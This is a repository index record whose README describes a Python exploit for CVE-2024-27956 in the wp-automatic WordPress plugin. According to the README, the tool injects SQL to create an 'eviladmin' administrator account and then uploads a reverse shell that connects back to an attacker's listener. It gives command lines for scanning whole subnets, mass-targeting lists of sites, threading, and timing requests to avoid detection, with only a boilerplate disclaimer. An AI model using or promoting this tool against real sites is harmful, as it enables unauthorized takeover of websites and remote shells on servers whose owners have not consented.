{"id":21643472,"url":"https://github.com/aigptcode/wordpress-auto-admin-account-and-reverse-shell-cve-2024-27956","last_synced_at":"2025-04-11T18:20:51.987Z","repository":{"id":239776444,"uuid":"800537570","full_name":"AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956","owner":"AiGptCode","description":"WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries","archived":false,"fork":false,"pushed_at":"2024-07-01T09:29:02.000Z","size":61,"stargazers_count":105,"open_issues_count":0,"forks_count":25,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-03-25T14:12:25.601Z","etag":null,"topics":["android","backdoor","backdoors","cve","exploit","hack","hacking","html","nuclei","nuclei-templates","php","ransomware","rce","reverse-shell","shell","website","windows","wordpress","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AiGptCode.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-14T14:21:49.000Z","updated_at":"2025-03-23T18:53:43.000Z","dependencies_parsed_at":null,"dependency_job_id":"242770ab-cd2f-435e-9c07-461b3da716e6","html_url":"https://github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956","commit_stats":null,"previous_names":["aigptcode/wordpress-cve-2024-27956-auto-shell"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AiGptCode%2FWordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AiGptCode%2FWordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AiGptCode%2FWordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AiGptCode%2FWordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AiGptCode","download_url":"https://codeload.github.com/AiGptCode/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248456385,"owners_count":21106606,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","backdoor","backdoors","cve","exploit","hack","hacking","html","nuclei","nuclei-templates","php","ransomware","rce","reverse-shell","shell","website","windows","wordpress","wordpress-plugin"],"created_at":"2024-11-25T05:34:33.150Z","updated_at":"2025-04-11T18:20:51.941Z","avatar_url":"https://github.com/AiGptCode.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"## WordPress Admin Account Creation and Reverse Shell (cve-2024-27956)\n\nThis Python script automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries on the WordPress database and gain administrative access.\n\n  \n## update 🦹‍♀️\n \n### Nuclei template added\n### add some more methods for supporting massive attack targets \n### add multiple targets support\n### add Auto find target by scanners base ip or txt file \n\n## How to use \n\n- Here are some more advanced examples of how you might use the script, assuming you have the proper authorization to test the target systems.\n\n1. **Scanning a subnet**: If you want to scan a subnet for vulnerable WordPress installations, you can use the `--subnet` option. For example:\n   ```\n   python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0\n   ```\n   This command will scan the `192.168.1.0/24` subnet for WordPress sites with the vulnerable WP Automatic plugin, and attempt to exploit them using the provided listener settings.\n\n2. **Customizing the delay**: The delay between requests can be adjusted using the `--delay` option. A higher delay may help avoid detection or rate limiting, while a lower delay can speed up the exploitation process. For example:\n   ```\n   python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5\n   ```\n   This command will use a delay of 2.5 seconds between requests.\n\n3. **Using a remote listener**: If your listener is set up on a remote machine, you can specify its IP address and port using the `--lhost` and `--lport` options. For example:\n   ```\n   python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0\n   ```\n   This command will connect back to a listener on `192.168.1.100:8080`.\n\n4. **Increasing the number of threads**: You can increase the number of threads used by the script with the `--threads` option. This can speed up the exploitation process, but may also increase the likelihood of detection or cause issues with rate limiting. For example:\n   ```\n   python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0\n   ```\n   This command will use 20 threads for exploitation.\n\n\n## Prerequisites\n\n- Python 3.x\n- `requests` library (install via `pip install requests`)\n- Netcat (for setting up a listener to connect to the reverse shell)\n\n## Usage\n\n1. Replace the `domain` variable in the script with the URL of the target WordPress site.\n2. Run the Python script.\n3. Once the script is executed, it will create a new admin user named `eviladmin`, set the password, and assign administrative privileges.\n4. It will then upload and execute a reverse shell payload on the target server.\n5. Set up a netcat listener to connect to the reverse shell using the specified port.\n\n**Note:** Ensure that you have proper authorization and permissions before running this script, as it can lead to security vulnerabilities and legal consequences if misused.\n\n## Disclaimer\n\nThis script is provided for educational and testing purposes only. The author assumes no liability for any unauthorized or illegal use of this script. Use it at your own risk.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faigptcode%2Fwordpress-auto-admin-account-and-reverse-shell-cve-2024-27956","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faigptcode%2Fwordpress-auto-admin-account-and-reverse-shell-cve-2024-27956","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faigptcode%2Fwordpress-auto-admin-account-and-reverse-shell-cve-2024-27956/lists"}